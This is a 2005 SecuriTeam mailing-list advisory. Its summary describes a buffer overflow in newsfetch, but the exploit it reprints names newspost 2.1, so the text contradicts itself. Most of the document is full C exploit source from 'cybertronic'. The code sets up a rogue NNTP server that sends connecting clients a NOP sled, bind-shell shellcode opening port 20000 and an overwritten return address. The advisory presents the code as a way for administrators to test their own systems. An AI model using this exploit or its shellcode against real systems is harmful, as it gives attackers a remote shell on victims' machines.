The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
newsfetch Buffer Overflow Exploit
------------------------------------------------------------------------
SUMMARY
<http://www.securiteam.com/unixfocus/5RP050KEUK.html> newsfetch is "a
powerfull utility to fetch news from an NNTP server and stores in the
mailbox format. The files created by newsfetch can be used with any mail
reader".
Due to poor handling of provided that an attacker can cause newsfetch to
overflow an internal buffer. The following exploit code can be used to
test your system for the mentioned vulnerability.
DETAILS
Exploit:
/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit
Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic <file>
Greetz fly to my girlfriend YASMIN H.
?
?M
M ?MMM
MMm ?MMMM
M$$MMm ?MMMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm ?MMMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM?
MMMM$$$MMMMMMMm MMM$$MMM?
`MMMMMMMMMMMMMm MMMMMMM?
`MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
?MMM#MMMMMMMMMMMMMMMMMMMMm
4MMM< >MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
?Mn ?MMMMMMMMMMMMMMMMMMMMMMMMM ?Mnn
nM `MMMMMMMMMMMMMMMMMMMMMM? n?
`? MMMMMMMMMMMMMMMMM? n?
MMMMMM?
mtr?
mMMM nmM mM
mM?? M ' M n
mM$ nM n?MMn?
4M m ?M N ?
?`
m? `n? mM NM? NM
mM mMm nm M??M ? n?Mm ?n xn , ? ?n xn ?Mm Mn n?
nM
nMm
mM `mMM? nM M nM ,` ?n? y M ?n? y nM ? nM
?
M? M' ? M n.,? nm nM nM n M ?
? n
MM? mM M nM M? n , nM ? nM M nM M M
M? M
n
MMM? M? nM M M n?nN ?M nM ?M `?M? ?? .N
nM
?nM?
M?
n? cybertronic 2oo5
? ________________
----------------------/
MMMMMMMMm mMMMMMMM?
?MM$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM?
just want to say love you dad!
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 119
#define BACKLOG 5
//92 bytes bindcode port 20000
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h
void cmd ( int connfd );
void header ();
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof (
servaddr ) );
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * )
&cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
printf ( "[*]" GREEN " Incomming connection
from:\t %s\n"
NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
cmd ( connfd );
}
close ( connfd );
}
}
void
cmd ( int s )
{
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;
bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof ( scode ) );
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out )
);
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}
void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED
"### "
GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# " YELLOW
"###\n"
NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "#
# "
GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# " YELLOW "#
\n"
NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED
"### "
GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#
\n"
NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "#
# "
GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# " YELLOW "#
\n"
NORMAL);
printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "#
# "
GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# " YELLOW
"###\n"
NORMAL);
printf ( RED " cybertronic@gmx.net\n" NORMAL );
printf ( RED " ----------(c) 2005----------\n\n"
NORMAL );
printf ( "newspost-2.1\n\n" );
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:cybertronic@gmx.net> cyber
tronic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
